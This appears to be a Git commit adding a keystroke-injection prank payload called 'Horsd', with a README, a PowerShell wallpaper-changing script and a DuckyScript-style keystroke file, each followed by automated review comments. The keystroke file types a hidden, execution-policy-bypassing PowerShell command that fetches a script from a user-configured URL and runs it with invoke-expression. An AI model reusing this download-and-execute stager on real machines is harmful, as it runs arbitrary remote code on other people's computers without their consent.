Commit Horsd payload

pull/322/head
Rayden 2023-05-10 04:30:53 +10:00
parent 094434e61c
commit 3764def08d
No known key found for this signature in database
GPG Key ID: CC3FFEC64F1DEF2D
3 changed files with 57 additions and 0 deletions


@ -0,0 +1,3 @@
# Horsd - In memorium to my Nan
Changes the target users background to a picture of a brown horse running, a nod to my nan's laptop background.
** This script requires very minor configuration found on LN:23 of the payload, set your own direct access link to the horsd.ps1 powershell script.
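
Review bot: the configuration pointer on the last line ("LN:23 of the payload") is a hard-coded line number that goes stale as soon as the payload is edited; point to the `REM ### REQUIRES CONFIGURATION ###` marker instead. The README also does not mention that the payload makes two network fetches (the image from i.imgur.com and the self-hosted horsd.ps1); list both so a reader knows what the target machine will contact. Minor: "memorium" should be "memoriam", and the leading `**` on the last line is never closed.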


@ -0,0 +1,18 @@
$Image="%UserProfile%/horse.jpg"
$code = @'
using System.Runtime.InteropServices;
namespace Win32{
public class Wallpaper{
[DllImport("user32.dll", CharSet=CharSet.Auto)]
static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;
public static void SetWallpaper(string thePath){
SystemParametersInfo(20,0,thePath,3);
}
}
}
'@
add-type $code
[Win32.Wallpaper]::SetWallpaper($Image)
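
Review bot: `$Image="%UserProfile%/horse.jpg"` on the first line uses cmd-style `%UserProfile%`, which PowerShell does not expand inside a string, so `SetWallpaper` is passed the literal text; build the path from `$env:USERPROFILE` instead. The `SystemParametersInfo(20,0,thePath,3)` call also relies on undocumented magic numbers and discards its return value: add a comment naming them (20 is SPI_SETDESKWALLPAPER, 3 is SPIF_UPDATEINIFILE | SPIF_SENDCHANGE) and check the result so a failed call is visible.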


@ -0,0 +1,36 @@
REM Title: Horsd
REM Author: MocconaCoffee
REM Description: A simple script that will change the users wallpaper to Brown Horse that is running.
REM Dedicated to: This script is a toast to my Nan that passed recently (she pioneered horse backgrounds on her decade-old laptop.)
REM Target OS: Windows 10
REM Required Configurations: Ensure that you have amended changes to the URL with a direct link to the script hosted by your own hosting service. DO NOT use GitHub as a medium for staging the script.
DELAY 3000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 300
STRING Invoke-WebRequest -Uri https://i.imgur.com/jwstWRR.jpg -OutFile horse.jpg
ENTER
DELAY 100
STRING exit
ENTER
DELAY 1000
GUI r
DELAY 300
REM ### REQUIRES CONFIGURATION ###
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr <your own hosted link here>/horsd.ps1?dl=1; invoke-expression $pl
REM ### ---------------------- ###
ENTER
DELAY 1000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 300
STRING Remove-Item horse.jpg
ENTER
DELAY 300
STRING exit
ENTER
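
Review bot: the `REQUIRES CONFIGURATION` line runs whatever the configured URL returns (`$pl = iwr ...; invoke-expression $pl`) with `-Exec Bypass` in a hidden window and no integrity check, so the code that executes is not necessarily the horsd.ps1 reviewed in this commit. Say so in the REM header, and compare the download against a known hash of horsd.ps1 before it is run. The header Description also omits the image fetch from i.imgur.com and the later `Remove-Item horse.jpg`, and the fixed `DELAY 1000` before that cleanup does not guarantee the wallpaper script has finished with the file.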